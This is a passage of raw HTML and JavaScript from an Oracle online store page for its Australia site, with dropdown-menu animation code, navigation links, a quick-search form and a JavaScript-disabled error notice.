subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298367:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10062:1298367:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Australia </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarSelected"> <a class="OraTabBarSelected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10062:1298367:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="ibeCCtpSctDspRte.jsp?section=10389&sitex=10062:1298367:US">Welcome</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Selected" nowrap> <a class="OraNav2Selected" target=_parent href="ibeCCtpSctDspRte.jsp?section=10381&sitex=10062:1298367:US">How to Order</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="ibeCCtpSctDspRte.jsp?section=10388&sitex=10062:1298367:US">Trial Software</a> </td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10062:1298367:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gi..